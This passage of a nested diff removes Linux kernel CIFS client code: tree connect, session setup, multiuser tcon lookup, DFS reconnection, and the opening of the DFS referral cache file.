+-	pSMB = (TCONX_REQ *) smb_buffer;
+-	pSMBr = (TCONX_RSP *) smb_buffer_response;
+-
+-	pSMB->AndXCommand = 0xFF;
+-	pSMB->Flags = cpu_to_le16(TCON_EXTENDED_SECINFO);
+-	bcc_ptr = &pSMB->Password[0];
+-
+-	pSMB->PasswordLength = cpu_to_le16(1);	/* minimum */
+-	*bcc_ptr = 0; /* password is null byte */
+-	bcc_ptr++;              /* skip password */
+-	/* already aligned so no need to do it below */
+-
+-	if (ses->server->sign)
+-		smb_buffer->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	if (ses->capabilities & CAP_STATUS32) {
+-		smb_buffer->Flags2 |= SMBFLG2_ERR_STATUS;
+-	}
+-	if (ses->capabilities & CAP_DFS) {
+-		smb_buffer->Flags2 |= SMBFLG2_DFS;
+-	}
+-	if (ses->capabilities & CAP_UNICODE) {
+-		smb_buffer->Flags2 |= SMBFLG2_UNICODE;
+-		length =
+-		    cifs_strtoUTF16((__le16 *) bcc_ptr, tree,
+-			6 /* max utf8 char length in bytes */ *
+-			(/* server len*/ + 256 /* share len */), nls_codepage);
+-		bcc_ptr += 2 * length;	/* convert num 16 bit words to bytes */
+-		bcc_ptr += 2;	/* skip trailing null */
+-	} else {		/* ASCII */
+-		strcpy(bcc_ptr, tree);
+-		bcc_ptr += strlen(tree) + 1;
+-	}
+-	strcpy(bcc_ptr, "?????");
+-	bcc_ptr += strlen("?????");
+-	bcc_ptr += 1;
+-	count = bcc_ptr - &pSMB->Password[0];
+-	be32_add_cpu(&pSMB->hdr.smb_buf_length, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, ses, smb_buffer, smb_buffer_response, &length,
+-			 0);
+-
+-	/* above now done in SendReceive */
+-	if (rc == 0) {
+-		bool is_unicode;
+-
+-		tcon->tid = smb_buffer_response->Tid;
+-		bcc_ptr = pByteArea(smb_buffer_response);
+-		bytes_left = get_bcc(smb_buffer_response);
+-		length = strnlen(bcc_ptr, bytes_left - 2);
+-		if (smb_buffer->Flags2 & SMBFLG2_UNICODE)
+-			is_unicode = true;
+-		else
+-			is_unicode = false;
+-
+-
+-		/* skip service field (NB: this field is always ASCII) */
+-		if (length == 3) {
+-			if ((bcc_ptr[0] == 'I') && (bcc_ptr[1] == 'P') &&
+-			    (bcc_ptr[2] == 'C')) {
+-				cifs_dbg(FYI, "IPC connection\n");
+-				tcon->ipc = true;
+-				tcon->pipe = true;
+-			}
+-		} else if (length == 2) {
+-			if ((bcc_ptr[0] == 'A') && (bcc_ptr[1] == ':')) {
+-				/* the most common case */
+-				cifs_dbg(FYI, "disk share connection\n");
+-			}
+-		}
+-		bcc_ptr += length + 1;
+-		bytes_left -= (length + 1);
+-		strscpy(tcon->tree_name, tree, sizeof(tcon->tree_name));
+-
+-		/* mostly informational -- no need to fail on error here */
+-		kfree(tcon->nativeFileSystem);
+-		tcon->nativeFileSystem = cifs_strndup_from_utf16(bcc_ptr,
+-						      bytes_left, is_unicode,
+-						      nls_codepage);
+-
+-		cifs_dbg(FYI, "nativeFileSystem=%s\n", tcon->nativeFileSystem);
+-
+-		if ((smb_buffer_response->WordCount == 3) ||
+-			 (smb_buffer_response->WordCount == 7))
+-			/* field is in same location */
+-			tcon->Flags = le16_to_cpu(pSMBr->OptionalSupport);
+-		else
+-			tcon->Flags = 0;
+-		cifs_dbg(FYI, "Tcon flags: 0x%x\n", tcon->Flags);
+-	}
+-
+-	cifs_buf_release(smb_buffer);
+-	return rc;
+-}
+-
+-static void delayed_free(struct rcu_head *p)
+-{
+-	struct cifs_sb_info *cifs_sb = container_of(p, struct cifs_sb_info, rcu);
+-
+-	unload_nls(cifs_sb->local_nls);
+-	smb3_cleanup_fs_context(cifs_sb->ctx);
+-	kfree(cifs_sb);
+-}
+-
+-void
+-cifs_umount(struct cifs_sb_info *cifs_sb)
+-{
+-	struct rb_root *root = &cifs_sb->tlink_tree;
+-	struct rb_node *node;
+-	struct tcon_link *tlink;
+-
+-	cancel_delayed_work_sync(&cifs_sb->prune_tlinks);
+-
+-	spin_lock(&cifs_sb->tlink_tree_lock);
+-	while ((node = rb_first(root))) {
+-		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
+-		cifs_get_tlink(tlink);
+-		clear_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
+-		rb_erase(node, root);
+-
+-		spin_unlock(&cifs_sb->tlink_tree_lock);
+-		cifs_put_tlink(tlink);
+-		spin_lock(&cifs_sb->tlink_tree_lock);
+-	}
+-	spin_unlock(&cifs_sb->tlink_tree_lock);
+-
+-	kfree(cifs_sb->prepath);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	dfs_cache_put_refsrv_sessions(&cifs_sb->dfs_mount_id);
+-#endif
+-	call_rcu(&cifs_sb->rcu, delayed_free);
+-}
+-
+-int
+-cifs_negotiate_protocol(const unsigned int xid, struct cifs_ses *ses,
+-			struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-
+-	if (!server->ops->need_neg || !server->ops->negotiate)
+-		return -ENOSYS;
+-
+-	/* only send once per connect */
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus != CifsGood &&
+-	    server->tcpStatus != CifsNew &&
+-	    server->tcpStatus != CifsNeedNegotiate) {
+-		spin_unlock(&server->srv_lock);
+-		return -EHOSTDOWN;
+-	}
+-
+-	if (!server->ops->need_neg(server) &&
+-	    server->tcpStatus == CifsGood) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-
+-	server->tcpStatus = CifsInNegotiate;
+-	spin_unlock(&server->srv_lock);
+-
+-	rc = server->ops->negotiate(xid, ses, server);
+-	if (rc == 0) {
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus == CifsInNegotiate)
+-			server->tcpStatus = CifsGood;
+-		else
+-			rc = -EHOSTDOWN;
+-		spin_unlock(&server->srv_lock);
+-	} else {
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus == CifsInNegotiate)
+-			server->tcpStatus = CifsNeedNegotiate;
+-		spin_unlock(&server->srv_lock);
+-	}
+-
+-	return rc;
+-}
+-
+-int
+-cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+-		   struct TCP_Server_Info *server,
+-		   struct nls_table *nls_info)
+-{
+-	int rc = -ENOSYS;
+-	struct TCP_Server_Info *pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&pserver->dstaddr;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&pserver->dstaddr;
+-	bool is_binding = false;
+-
+-	spin_lock(&ses->ses_lock);
+-	cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
+-		 __func__, ses->chans_need_reconnect);
+-
+-	if (ses->ses_status != SES_GOOD &&
+-	    ses->ses_status != SES_NEW &&
+-	    ses->ses_status != SES_NEED_RECON) {
+-		spin_unlock(&ses->ses_lock);
+-		return -EHOSTDOWN;
+-	}
+-
+-	/* only send once per connect */
+-	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_GOOD(ses)) {
+-		if (ses->ses_status == SES_NEED_RECON)
+-			ses->ses_status = SES_GOOD;
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-		return 0;
+-	}
+-
+-	cifs_chan_set_in_reconnect(ses, server);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
+-
+-	if (!is_binding)
+-		ses->ses_status = SES_IN_SETUP;
+-	spin_unlock(&ses->ses_lock);
+-
+-	/* update ses ip_addr only for primary chan */
+-	if (server == pserver) {
+-		if (server->dstaddr.ss_family == AF_INET6)
+-			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
+-		else
+-			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
+-	}
+-
+-	if (!is_binding) {
+-		ses->capabilities = server->capabilities;
+-		if (!linuxExtEnabled)
+-			ses->capabilities &= (~server->vals->cap_unix);
+-
+-		if (ses->auth_key.response) {
+-			cifs_dbg(FYI, "Free previous auth_key.response = %p\n",
+-				 ses->auth_key.response);
+-			kfree_sensitive(ses->auth_key.response);
+-			ses->auth_key.response = NULL;
+-			ses->auth_key.len = 0;
+-		}
+-	}
+-
+-	cifs_dbg(FYI, "Security Mode: 0x%x Capabilities: 0x%x TimeAdjust: %d\n",
+-		 server->sec_mode, server->capabilities, server->timeAdj);
+-
+-	if (server->ops->sess_setup)
+-		rc = server->ops->sess_setup(xid, ses, server, nls_info);
+-
+-	if (rc) {
+-		cifs_server_dbg(VFS, "Send error in SessSetup = %d\n", rc);
+-		spin_lock(&ses->ses_lock);
+-		if (ses->ses_status == SES_IN_SETUP)
+-			ses->ses_status = SES_NEED_RECON;
+-		spin_lock(&ses->chan_lock);
+-		cifs_chan_clear_in_reconnect(ses, server);
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-	} else {
+-		spin_lock(&ses->ses_lock);
+-		if (ses->ses_status == SES_IN_SETUP)
+-			ses->ses_status = SES_GOOD;
+-		spin_lock(&ses->chan_lock);
+-		cifs_chan_clear_in_reconnect(ses, server);
+-		cifs_chan_clear_need_reconnect(ses, server);
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-	}
+-
+-	return rc;
+-}
+-
+-static int
+-cifs_set_vol_auth(struct smb3_fs_context *ctx, struct cifs_ses *ses)
+-{
+-	ctx->sectype = ses->sectype;
+-
+-	/* krb5 is special, since we don't need username or pw */
+-	if (ctx->sectype == Kerberos)
+-		return 0;
+-
+-	return cifs_set_cifscreds(ctx, ses);
+-}
+-
+-static struct cifs_tcon *
+-cifs_construct_tcon(struct cifs_sb_info *cifs_sb, kuid_t fsuid)
+-{
+-	int rc;
+-	struct cifs_tcon *master_tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon = NULL;
+-	struct smb3_fs_context *ctx;
+-
+-	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+-	if (ctx == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	ctx->local_nls = cifs_sb->local_nls;
+-	ctx->linux_uid = fsuid;
+-	ctx->cred_uid = fsuid;
+-	ctx->UNC = master_tcon->tree_name;
+-	ctx->retry = master_tcon->retry;
+-	ctx->nocase = master_tcon->nocase;
+-	ctx->nohandlecache = master_tcon->nohandlecache;
+-	ctx->local_lease = master_tcon->local_lease;
+-	ctx->no_lease = master_tcon->no_lease;
+-	ctx->resilient = master_tcon->use_resilient;
+-	ctx->persistent = master_tcon->use_persistent;
+-	ctx->handle_timeout = master_tcon->handle_timeout;
+-	ctx->no_linux_ext = !master_tcon->unix_ext;
+-	ctx->linux_ext = master_tcon->posix_extensions;
+-	ctx->sectype = master_tcon->ses->sectype;
+-	ctx->sign = master_tcon->ses->sign;
+-	ctx->seal = master_tcon->seal;
+-	ctx->witness = master_tcon->use_witness;
+-
+-	rc = cifs_set_vol_auth(ctx, master_tcon->ses);
+-	if (rc) {
+-		tcon = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	/* get a reference for the same TCP session */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	++master_tcon->ses->server->srv_count;
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	ses = cifs_get_smb_ses(master_tcon->ses->server, ctx);
+-	if (IS_ERR(ses)) {
+-		tcon = (struct cifs_tcon *)ses;
+-		cifs_put_tcp_session(master_tcon->ses->server, 0);
+-		goto out;
+-	}
+-
+-	tcon = cifs_get_tcon(ses, ctx);
+-	if (IS_ERR(tcon)) {
+-		cifs_put_smb_ses(ses);
+-		goto out;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(ses))
+-		reset_cifs_unix_caps(0, tcon, NULL, ctx);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-out:
+-	kfree(ctx->username);
+-	kfree_sensitive(ctx->password);
+-	kfree(ctx);
+-
+-	return tcon;
+-}
+-
+-struct cifs_tcon *
+-cifs_sb_master_tcon(struct cifs_sb_info *cifs_sb)
+-{
+-	return tlink_tcon(cifs_sb_master_tlink(cifs_sb));
+-}
+-
+-/* find and return a tlink with given uid */
+-static struct tcon_link *
+-tlink_rb_search(struct rb_root *root, kuid_t uid)
+-{
+-	struct rb_node *node = root->rb_node;
+-	struct tcon_link *tlink;
+-
+-	while (node) {
+-		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
+-
+-		if (uid_gt(tlink->tl_uid, uid))
+-			node = node->rb_left;
+-		else if (uid_lt(tlink->tl_uid, uid))
+-			node = node->rb_right;
+-		else
+-			return tlink;
+-	}
+-	return NULL;
+-}
+-
+-/* insert a tcon_link into the tree */
+-static void
+-tlink_rb_insert(struct rb_root *root, struct tcon_link *new_tlink)
+-{
+-	struct rb_node **new = &(root->rb_node), *parent = NULL;
+-	struct tcon_link *tlink;
+-
+-	while (*new) {
+-		tlink = rb_entry(*new, struct tcon_link, tl_rbnode);
+-		parent = *new;
+-
+-		if (uid_gt(tlink->tl_uid, new_tlink->tl_uid))
+-			new = &((*new)->rb_left);
+-		else
+-			new = &((*new)->rb_right);
+-	}
+-
+-	rb_link_node(&new_tlink->tl_rbnode, parent, new);
+-	rb_insert_color(&new_tlink->tl_rbnode, root);
+-}
+-
+-/*
+- * Find or construct an appropriate tcon given a cifs_sb and the fsuid of the
+- * current task.
+- *
+- * If the superblock doesn't refer to a multiuser mount, then just return
+- * the master tcon for the mount.
+- *
+- * First, search the rbtree for an existing tcon for this fsuid. If one
+- * exists, then check to see if it's pending construction. If it is then wait
+- * for construction to complete. Once it's no longer pending, check to see if
+- * it failed and either return an error or retry construction, depending on
+- * the timeout.
+- *
+- * If one doesn't exist then insert a new tcon_link struct into the tree and
+- * try to construct a new one.
+- */
+-struct tcon_link *
+-cifs_sb_tlink(struct cifs_sb_info *cifs_sb)
+-{
+-	int ret;
+-	kuid_t fsuid = current_fsuid();
+-	struct tcon_link *tlink, *newtlink;
+-
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
+-		return cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
+-
+-	spin_lock(&cifs_sb->tlink_tree_lock);
+-	tlink = tlink_rb_search(&cifs_sb->tlink_tree, fsuid);
+-	if (tlink)
+-		cifs_get_tlink(tlink);
+-	spin_unlock(&cifs_sb->tlink_tree_lock);
+-
+-	if (tlink == NULL) {
+-		newtlink = kzalloc(sizeof(*tlink), GFP_KERNEL);
+-		if (newtlink == NULL)
+-			return ERR_PTR(-ENOMEM);
+-		newtlink->tl_uid = fsuid;
+-		newtlink->tl_tcon = ERR_PTR(-EACCES);
+-		set_bit(TCON_LINK_PENDING, &newtlink->tl_flags);
+-		set_bit(TCON_LINK_IN_TREE, &newtlink->tl_flags);
+-		cifs_get_tlink(newtlink);
+-
+-		spin_lock(&cifs_sb->tlink_tree_lock);
+-		/* was one inserted after previous search? */
+-		tlink = tlink_rb_search(&cifs_sb->tlink_tree, fsuid);
+-		if (tlink) {
+-			cifs_get_tlink(tlink);
+-			spin_unlock(&cifs_sb->tlink_tree_lock);
+-			kfree(newtlink);
+-			goto wait_for_construction;
+-		}
+-		tlink = newtlink;
+-		tlink_rb_insert(&cifs_sb->tlink_tree, tlink);
+-		spin_unlock(&cifs_sb->tlink_tree_lock);
+-	} else {
+-wait_for_construction:
+-		ret = wait_on_bit(&tlink->tl_flags, TCON_LINK_PENDING,
+-				  TASK_INTERRUPTIBLE);
+-		if (ret) {
+-			cifs_put_tlink(tlink);
+-			return ERR_PTR(-ERESTARTSYS);
+-		}
+-
+-		/* if it's good, return it */
+-		if (!IS_ERR(tlink->tl_tcon))
+-			return tlink;
+-
+-		/* return error if we tried this already recently */
+-		if (time_before(jiffies, tlink->tl_time + TLINK_ERROR_EXPIRE)) {
+-			cifs_put_tlink(tlink);
+-			return ERR_PTR(-EACCES);
+-		}
+-
+-		if (test_and_set_bit(TCON_LINK_PENDING, &tlink->tl_flags))
+-			goto wait_for_construction;
+-	}
+-
+-	tlink->tl_tcon = cifs_construct_tcon(cifs_sb, fsuid);
+-	clear_bit(TCON_LINK_PENDING, &tlink->tl_flags);
+-	wake_up_bit(&tlink->tl_flags, TCON_LINK_PENDING);
+-
+-	if (IS_ERR(tlink->tl_tcon)) {
+-		cifs_put_tlink(tlink);
+-		return ERR_PTR(-EACCES);
+-	}
+-
+-	return tlink;
+-}
+-
+-/*
+- * periodic workqueue job that scans tcon_tree for a superblock and closes
+- * out tcons.
+- */
+-static void
+-cifs_prune_tlinks(struct work_struct *work)
+-{
+-	struct cifs_sb_info *cifs_sb = container_of(work, struct cifs_sb_info,
+-						    prune_tlinks.work);
+-	struct rb_root *root = &cifs_sb->tlink_tree;
+-	struct rb_node *node;
+-	struct rb_node *tmp;
+-	struct tcon_link *tlink;
+-
+-	/*
+-	 * Because we drop the spinlock in the loop in order to put the tlink
+-	 * it's not guarded against removal of links from the tree. The only
+-	 * places that remove entries from the tree are this function and
+-	 * umounts. Because this function is non-reentrant and is canceled
+-	 * before umount can proceed, this is safe.
+-	 */
+-	spin_lock(&cifs_sb->tlink_tree_lock);
+-	node = rb_first(root);
+-	while (node != NULL) {
+-		tmp = node;
+-		node = rb_next(tmp);
+-		tlink = rb_entry(tmp, struct tcon_link, tl_rbnode);
+-
+-		if (test_bit(TCON_LINK_MASTER, &tlink->tl_flags) ||
+-		    atomic_read(&tlink->tl_count) != 0 ||
+-		    time_after(tlink->tl_time + TLINK_IDLE_EXPIRE, jiffies))
+-			continue;
+-
+-		cifs_get_tlink(tlink);
+-		clear_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
+-		rb_erase(tmp, root);
+-
+-		spin_unlock(&cifs_sb->tlink_tree_lock);
+-		cifs_put_tlink(tlink);
+-		spin_lock(&cifs_sb->tlink_tree_lock);
+-	}
+-	spin_unlock(&cifs_sb->tlink_tree_lock);
+-
+-	queue_delayed_work(cifsiod_wq, &cifs_sb->prune_tlinks,
+-				TLINK_IDLE_EXPIRE);
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-/* Update dfs referral path of superblock */
+-static int update_server_fullpath(struct TCP_Server_Info *server, struct cifs_sb_info *cifs_sb,
+-				  const char *target)
+-{
+-	int rc = 0;
+-	size_t len = strlen(target);
+-	char *refpath, *npath;
+-
+-	if (unlikely(len < 2 || *target != '\\'))
+-		return -EINVAL;
+-
+-	if (target[1] == '\\') {
+-		len += 1;
+-		refpath = kmalloc(len, GFP_KERNEL);
+-		if (!refpath)
+-			return -ENOMEM;
+-
+-		scnprintf(refpath, len, "%s", target);
+-	} else {
+-		len += sizeof("\\");
+-		refpath = kmalloc(len, GFP_KERNEL);
+-		if (!refpath)
+-			return -ENOMEM;
+-
+-		scnprintf(refpath, len, "\\%s", target);
+-	}
+-
+-	npath = dfs_cache_canonical_path(refpath, cifs_sb->local_nls, cifs_remap(cifs_sb));
+-	kfree(refpath);
+-
+-	if (IS_ERR(npath)) {
+-		rc = PTR_ERR(npath);
+-	} else {
+-		mutex_lock(&server->refpath_lock);
+-		kfree(server->leaf_fullpath);
+-		server->leaf_fullpath = npath;
+-		mutex_unlock(&server->refpath_lock);
+-		server->current_fullpath = server->leaf_fullpath;
+-	}
+-	return rc;
+-}
+-
+-static int target_share_matches_server(struct TCP_Server_Info *server, const char *tcp_host,
+-				       size_t tcp_host_len, char *share, bool *target_match)
+-{
+-	int rc = 0;
+-	const char *dfs_host;
+-	size_t dfs_host_len;
+-
+-	*target_match = true;
+-	extract_unc_hostname(share, &dfs_host, &dfs_host_len);
+-
+-	/* Check if hostnames or addresses match */
+-	if (dfs_host_len != tcp_host_len || strncasecmp(dfs_host, tcp_host, dfs_host_len) != 0) {
+-		cifs_dbg(FYI, "%s: %.*s doesn't match %.*s\n", __func__, (int)dfs_host_len,
+-			 dfs_host, (int)tcp_host_len, tcp_host);
+-		rc = match_target_ip(server, dfs_host, dfs_host_len, target_match);
+-		if (rc)
+-			cifs_dbg(VFS, "%s: failed to match target ip: %d\n", __func__, rc);
+-	}
+-	return rc;
+-}
+-
+-static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
+-				     struct cifs_sb_info *cifs_sb, char *tree, bool islink,
+-				     struct dfs_cache_tgt_list *tl)
+-{
+-	int rc;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	const struct smb_version_operations *ops = server->ops;
+-	struct cifs_tcon *ipc = tcon->ses->tcon_ipc;
+-	char *share = NULL, *prefix = NULL;
+-	const char *tcp_host;
+-	size_t tcp_host_len;
+-	struct dfs_cache_tgt_iterator *tit;
+-	bool target_match;
+-
+-	extract_unc_hostname(server->hostname, &tcp_host, &tcp_host_len);
+-
+-	tit = dfs_cache_get_tgt_iterator(tl);
+-	if (!tit) {
+-		rc = -ENOENT;
+-		goto out;
+-	}
+-
+-	/* Try to tree connect to all dfs targets */
+-	for (; tit; tit = dfs_cache_get_next_tgt(tl, tit)) {
+-		const char *target = dfs_cache_get_tgt_name(tit);
+-		struct dfs_cache_tgt_list ntl = DFS_CACHE_TGT_LIST_INIT(ntl);
+-
+-		kfree(share);
+-		kfree(prefix);
+-		share = prefix = NULL;
+-
+-		/* Check if share matches with tcp ses */
+-		rc = dfs_cache_get_tgt_share(server->current_fullpath + 1, tit, &share, &prefix);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: failed to parse target share: %d\n", __func__, rc);
+-			break;
+-		}
+-
+-		rc = target_share_matches_server(server, tcp_host, tcp_host_len, share,
+-						 &target_match);
+-		if (rc)
+-			break;
+-		if (!target_match) {
+-			rc = -EHOSTUNREACH;
+-			continue;
+-		}
+-
+-		if (ipc->need_reconnect) {
+-			scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
+-			rc = ops->tree_connect(xid, ipc->ses, tree, ipc, cifs_sb->local_nls);
+-			if (rc)
+-				break;
+-		}
+-
+-		scnprintf(tree, MAX_TREE_SIZE, "\\%s", share);
+-		if (!islink) {
+-			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
+-			break;
+-		}
+-		/*
+-		 * If no dfs referrals were returned from link target, then just do a TREE_CONNECT
+-		 * to it.  Otherwise, cache the dfs referral and then mark current tcp ses for
+-		 * reconnect so either the demultiplex thread or the echo worker will reconnect to
+-		 * newly resolved target.
+-		 */
+-		if (dfs_cache_find(xid, tcon->ses, cifs_sb->local_nls, cifs_remap(cifs_sb), target,
+-				   NULL, &ntl)) {
+-			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
+-			if (rc)
+-				continue;
+-			rc = dfs_cache_noreq_update_tgthint(server->current_fullpath + 1, tit);
+-			if (!rc)
+-				rc = cifs_update_super_prepath(cifs_sb, prefix);
+-		} else {
+-			/* Target is another dfs share */
+-			rc = update_server_fullpath(server, cifs_sb, target);
+-			dfs_cache_free_tgts(tl);
+-
+-			if (!rc) {
+-				rc = -EREMOTE;
+-				list_replace_init(&ntl.tl_list, &tl->tl_list);
+-			} else
+-				dfs_cache_free_tgts(&ntl);
+-		}
+-		break;
+-	}
+-
+-out:
+-	kfree(share);
+-	kfree(prefix);
+-
+-	return rc;
+-}
+-
+-static int tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
+-				   struct cifs_sb_info *cifs_sb, char *tree, bool islink,
+-				   struct dfs_cache_tgt_list *tl)
+-{
+-	int rc;
+-	int num_links = 0;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	do {
+-		rc = __tree_connect_dfs_target(xid, tcon, cifs_sb, tree, islink, tl);
+-		if (!rc || rc != -EREMOTE)
+-			break;
+-	} while (rc = -ELOOP, ++num_links < MAX_NESTED_LINKS);
+-	/*
+-	 * If we couldn't tree connect to any targets from last referral path, then retry from
+-	 * original referral path.
+-	 */
+-	if (rc && server->current_fullpath != server->origin_fullpath) {
+-		server->current_fullpath = server->origin_fullpath;
+-		cifs_signal_cifsd_for_reconnect(server, true);
+-	}
+-
+-	dfs_cache_free_tgts(tl);
+-	return rc;
+-}
+-
+-int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const struct nls_table *nlsc)
+-{
+-	int rc;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	const struct smb_version_operations *ops = server->ops;
+-	struct super_block *sb = NULL;
+-	struct cifs_sb_info *cifs_sb;
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	char *tree;
+-	struct dfs_info3_param ref = {0};
+-
+-	/* only send once per connect */
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->ses->ses_status != SES_GOOD ||
+-	    (tcon->status != TID_NEW &&
+-	    tcon->status != TID_NEED_TCON)) {
+-		spin_unlock(&tcon->tc_lock);
+-		return 0;
+-	}
+-	tcon->status = TID_IN_TCON;
+-	spin_unlock(&tcon->tc_lock);
+-
+-	tree = kzalloc(MAX_TREE_SIZE, GFP_KERNEL);
+-	if (!tree) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	if (tcon->ipc) {
+-		scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
+-		rc = ops->tree_connect(xid, tcon->ses, tree, tcon, nlsc);
+-		goto out;
+-	}
+-
+-	sb = cifs_get_tcp_super(server);
+-	if (IS_ERR(sb)) {
+-		rc = PTR_ERR(sb);
+-		cifs_dbg(VFS, "%s: could not find superblock: %d\n", __func__, rc);
+-		goto out;
+-	}
+-
+-	cifs_sb = CIFS_SB(sb);
+-
+-	/* If it is not dfs or there was no cached dfs referral, then reconnect to same share */
+-	if (!server->current_fullpath ||
+-	    dfs_cache_noreq_find(server->current_fullpath + 1, &ref, &tl)) {
+-		rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, cifs_sb->local_nls);
+-		goto out;
+-	}
+-
+-	rc = tree_connect_dfs_target(xid, tcon, cifs_sb, tree, ref.server_type == DFS_TYPE_LINK,
+-				     &tl);
+-	free_dfs_info_param(&ref);
+-
+-out:
+-	kfree(tree);
+-	cifs_put_tcp_super(sb);
+-
+-	if (rc) {
+-		spin_lock(&tcon->tc_lock);
+-		if (tcon->status == TID_IN_TCON)
+-			tcon->status = TID_NEED_TCON;
+-		spin_unlock(&tcon->tc_lock);
+-	} else {
+-		spin_lock(&tcon->tc_lock);
+-		if (tcon->status == TID_IN_TCON)
+-			tcon->status = TID_GOOD;
+-		spin_unlock(&tcon->tc_lock);
+-		tcon->need_reconnect = false;
+-	}
+-
+-	return rc;
+-}
+-#else
+-int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const struct nls_table *nlsc)
+-{
+-	int rc;
+-	const struct smb_version_operations *ops = tcon->ses->server->ops;
+-
+-	/* only send once per connect */
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->ses->ses_status != SES_GOOD ||
+-	    (tcon->status != TID_NEW &&
+-	    tcon->status != TID_NEED_TCON)) {
+-		spin_unlock(&tcon->tc_lock);
+-		return 0;
+-	}
+-	tcon->status = TID_IN_TCON;
+-	spin_unlock(&tcon->tc_lock);
+-
+-	rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, nlsc);
+-	if (rc) {
+-		spin_lock(&tcon->tc_lock);
+-		if (tcon->status == TID_IN_TCON)
+-			tcon->status = TID_NEED_TCON;
+-		spin_unlock(&tcon->tc_lock);
+-	} else {
+-		spin_lock(&tcon->tc_lock);
+-		if (tcon->status == TID_IN_TCON)
+-			tcon->status = TID_GOOD;
+-		tcon->need_reconnect = false;
+-		spin_unlock(&tcon->tc_lock);
+-	}
+-
+-	return rc;
+-}
+-#endif
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+deleted file mode 100644
+index 3bc1d3494be3a..0000000000000
+--- a/fs/cifs/dfs_cache.c
++++ /dev/null
+@@ -1,1690 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * DFS referral cache routines
+- *
+- * Copyright (c) 2018-2019 Paulo Alcantara <palcantara@suse.de>
+- */
+-
+-#include <linux/jhash.h>
+-#include <linux/ktime.h>
+-#include <linux/slab.h>
+-#include <linux/proc_fs.h>
+-#include <linux/nls.h>
+-#include <linux/workqueue.h>
+-#include <linux/uuid.h>
+-#include "cifsglob.h"
+-#include "smb2pdu.h"
+-#include "smb2proto.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "smb2glob.h"
+-#include "dns_resolve.h"
+-
+-#include "dfs_cache.h"
+-
+-#define CACHE_HTABLE_SIZE 32
+-#define CACHE_MAX_ENTRIES 64
+-#define CACHE_MIN_TTL 120 /* 2 minutes */
+-
+-#define IS_DFS_INTERLINK(v) (((v) & DFSREF_REFERRAL_SERVER) && !((v) & DFSREF_STORAGE_SERVER))
+-
+-struct cache_dfs_tgt {
+-	char *name;
+-	int path_consumed;
+-	struct list_head list;
+-};
+-
+-struct cache_entry {
+-	struct hlist_node hlist;
+-	const char *path;
+-	int hdr_flags; /* RESP_GET_DFS_REFERRAL.ReferralHeaderFlags */
+-	int ttl; /* DFS_REREFERRAL_V3.TimeToLive */
+-	int srvtype; /* DFS_REREFERRAL_V3.ServerType */
+-	int ref_flags; /* DFS_REREFERRAL_V3.ReferralEntryFlags */
+-	struct timespec64 etime;
